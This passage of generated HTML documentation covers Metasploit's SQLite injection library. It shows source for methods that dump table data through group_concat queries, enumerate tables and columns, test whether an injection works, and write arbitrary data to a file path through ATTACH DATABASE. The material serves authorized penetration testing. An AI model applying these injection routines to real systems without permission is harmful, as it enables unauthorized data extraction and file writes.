<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_alias1'>alias1</span><span class='embexpr_end'>}</span><span class='tstring_content'>,&#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@concat_separator</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;),</span><span class='tstring_end'>&quot;</span></span>\
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>^OFFSET^,</span><span class='embexpr_beg'>#{</span><span class='ivar'>@truncation_length</span><span class='embexpr_end'>}</span><span class='tstring_content'>) from (select cast(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='embexpr_end'>}</span><span class='tstring_content'> as blob) </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_alias1'>alias1</span><span class='embexpr_end'>}</span><span class='tstring_content'> from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>\
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_limit'>limit</span><span class='embexpr_end'>}</span><span class='tstring_content'>) </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_alias2'>alias2</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='ivar'>@concat_separator</span> <span class='op'>||</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>,</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span> <span class='op'>=</span> <span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select group_concat(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_alias1'>alias1</span><span class='embexpr_end'>}</span><span class='tstring_content'>,&#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@concat_separator</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span>\
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'> from (select cast(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='embexpr_end'>}</span><span class='tstring_content'> as blob) </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_alias1'>alias1</span><span class='embexpr_end'>}</span><span class='tstring_content'> from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_limit'>limit</span><span class='embexpr_end'>}</span><span class='tstring_content'>) </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_alias2'>alias2</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='ivar'>@concat_separator</span> <span class='op'>||</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>,</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>else</span>
<span class='kw'>if</span> <span class='ivar'>@truncation_length</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span> <span class='op'>=</span> <span class='id identifier rubyid_truncated_query'>truncated_query</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>select substr(group_concat(</span><span class='tstring_end'>&#39;</span></span> \
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cast(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='embexpr_end'>}</span><span class='tstring_content'> as blob),&#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@concat_separator</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;),</span><span class='tstring_end'>&quot;</span></span> \
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>^OFFSET^,</span><span class='embexpr_beg'>#{</span><span class='ivar'>@truncation_length</span><span class='embexpr_end'>}</span><span class='tstring_content'>) from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_limit'>limit</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='ivar'>@concat_separator</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span> <span class='op'>=</span> <span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select group_concat(cast(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='embexpr_end'>}</span><span class='tstring_content'> as blob),&#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@concat_separator</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span> \
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'> from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_limit'>limit</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='ivar'>@concat_separator</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_row'>row</span><span class='op'>|</span>
<span class='id identifier rubyid_row'>row</span> <span class='op'>=</span> <span class='id identifier rubyid_row'>row</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='ivar'>@second_concat_separator</span><span class='rparen'>)</span>
<span class='ivar'>@encoder</span> <span class='op'>?</span> <span class='id identifier rubyid_row'>row</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_x'>x</span><span class='op'>|</span> <span class='ivar'>@encoder</span><span class='lbracket'>[</span><span class='symbol'>:decode</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_call'>call</span><span class='lparen'>(</span><span class='id identifier rubyid_x'>x</span><span class='rparen'>)</span> <span class='rbrace'>}</span> <span class='op'>:</span> <span class='id identifier rubyid_row'>row</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="enum_table_columns-instance_method">
#<strong>enum_table_columns</strong>(table) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the names of the columns of the given table</p>
<pre class="code ruby"><code class="ruby">NOTE: might not work if pragma_table_info is not supported, use run_sql,
and query sql from sqlite_master if you need it in older versions of SQLite
@param table [String] The name of a table
@return [Array] an array of strings, the names of the columns of the given table
</code></pre>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
55
56
57</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/sqlitei/common.rb', line 55</span>
<span class='kw'>def</span> <span class='id identifier rubyid_enum_table_columns'>enum_table_columns</span><span class='lparen'>(</span><span class='id identifier rubyid_table'>table</span><span class='rparen'>)</span>
<span class='id identifier rubyid_dump_table_fields'>dump_table_fields</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>pragma_table_info(&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='qwords_beg'>%w[</span><span class='tstring_content'>name</span><span class='tstring_end'>]</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_flatten'>flatten</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="enum_table_names-instance_method">
#<strong>enum_table_names</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the names of the tables present on the current database</p>
<pre class="code ruby"><code class="ruby">@return [Array] an array of Strings, the names of the tables in the current database
</code></pre>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
44
45
46</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/sqlitei/common.rb', line 44</span>
<span class='kw'>def</span> <span class='id identifier rubyid_enum_table_names'>enum_table_names</span>
<span class='id identifier rubyid_dump_table_fields'>dump_table_fields</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>sqlite_master</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='qwords_beg'>%w[</span><span class='tstring_content'>tbl_name</span><span class='tstring_end'>]</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>type=&#39;table&#39;</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_flatten'>flatten</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="test_vulnerable-instance_method">
#<strong>test_vulnerable</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns true if the SQL injection is found to work as expected</p>
<pre class="code ruby"><code class="ruby">@return [Boolean] whether the check determined that the SQL injection works
</code></pre>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
143
144
145
146
147
148
149
150
151</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/sqlitei/common.rb', line 143</span>
<span class='kw'>def</span> <span class='id identifier rubyid_test_vulnerable'>test_vulnerable</span>
<span class='id identifier rubyid_random_string_len'>random_string_len</span> <span class='op'>=</span> <span class='ivar'>@truncation_length</span> <span class='op'>?</span> <span class='lbracket'>[</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>2</span><span class='op'>..</span><span class='int'>10</span><span class='rparen'>)</span><span class='comma'>,</span> <span class='ivar'>@truncation_length</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_min'>min</span> <span class='op'>:</span> <span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>2</span><span class='op'>..</span><span class='int'>10</span><span class='rparen'>)</span>
<span class='id identifier rubyid_random_string'>random_string</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alphanumeric'>rand_text_alphanumeric</span><span class='lparen'>(</span><span class='id identifier rubyid_random_string_len'>random_string_len</span><span class='rparen'>)</span>
<span class='id identifier rubyid_query_string'>query_string</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_random_string'>random_string</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_query_string'>query_string</span> <span class='op'>=</span> <span class='ivar'>@encoder</span><span class='lbracket'>[</span><span class='symbol'>:encode</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_sub'>sub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>^DATA^</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_query_string'>query_string</span><span class='rparen'>)</span> <span class='kw'>if</span> <span class='ivar'>@encoder</span>
<span class='id identifier rubyid_output'>output</span> <span class='op'>=</span> <span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_query_string'>query_string</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>false</span> <span class='kw'>if</span> <span class='id identifier rubyid_output'>output</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='lparen'>(</span><span class='ivar'>@encoder</span> <span class='op'>?</span> <span class='ivar'>@encoder</span><span class='lbracket'>[</span><span class='symbol'>:decode</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_call'>call</span><span class='lparen'>(</span><span class='id identifier rubyid_output'>output</span><span class='rparen'>)</span> <span class='op'>:</span> <span class='id identifier rubyid_output'>output</span><span class='rparen'>)</span> <span class='op'>==</span> <span class='id identifier rubyid_random_string'>random_string</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="version-instance_method">
#<strong>version</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the version of SQLite in use</p>
<pre class="code ruby"><code class="ruby">@return [String] The version of SQLite in use
</code></pre>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
36
37
38</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/sqlitei/common.rb', line 36</span>
<span class='kw'>def</span> <span class='id identifier rubyid_version'>version</span>
<span class='id identifier rubyid_call_function'>call_function</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>sqlite_version()</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="write_to_file-instance_method">
#<strong>write_to_file</strong>(fpath, data) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Attempt writing data to the file at the given path Note: target must support stacked queries, and injection point must be at the start of a new query</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
64
65
66
67</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/sqlitei/common.rb', line 64</span>
<span class='kw'>def</span> <span class='id identifier rubyid_write_to_file'>write_to_file</span><span class='lparen'>(</span><span class='id identifier rubyid_fpath'>fpath</span><span class='comma'>,</span> <span class='id identifier rubyid_data'>data</span><span class='rparen'>)</span>
<span class='id identifier rubyid_db'>db</span><span class='comma'>,</span> <span class='id identifier rubyid_tbl'>tbl</span><span class='comma'>,</span> <span class='id identifier rubyid_col'>col</span> <span class='op'>=</span> <span class='int'>3</span><span class='period'>.</span><span class='id identifier rubyid_times'>times</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='lbrace'>{</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>2</span><span class='op'>..</span><span class='int'>5</span><span class='rparen'>)</span><span class='rparen'>)</span> <span class='rbrace'>}</span>
<span class='id identifier rubyid_raw_run_sql'>raw_run_sql</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>attach database &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fpath'>fpath</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39; AS </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_db'>db</span><span class='embexpr_end'>}</span><span class='tstring_content'>; create table </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_db'>db</span><span class='embexpr_end'>}</span><span class='tstring_content'>.</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_tbl'>tbl</span><span class='embexpr_end'>}</span><span class='tstring_content'>(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_col'>col</span><span class='embexpr_end'>}</span><span class='tstring_content'> blob); insert into </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_db'>db</span><span class='embexpr_end'>}</span><span class='tstring_content'>.</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_tbl'>tbl</span><span class='embexpr_end'>}</span><span class='tstring_content'>(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_col'>col</span><span class='embexpr_end'>}</span><span class='tstring_content'>) values(&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_data'>data</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:03:35 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink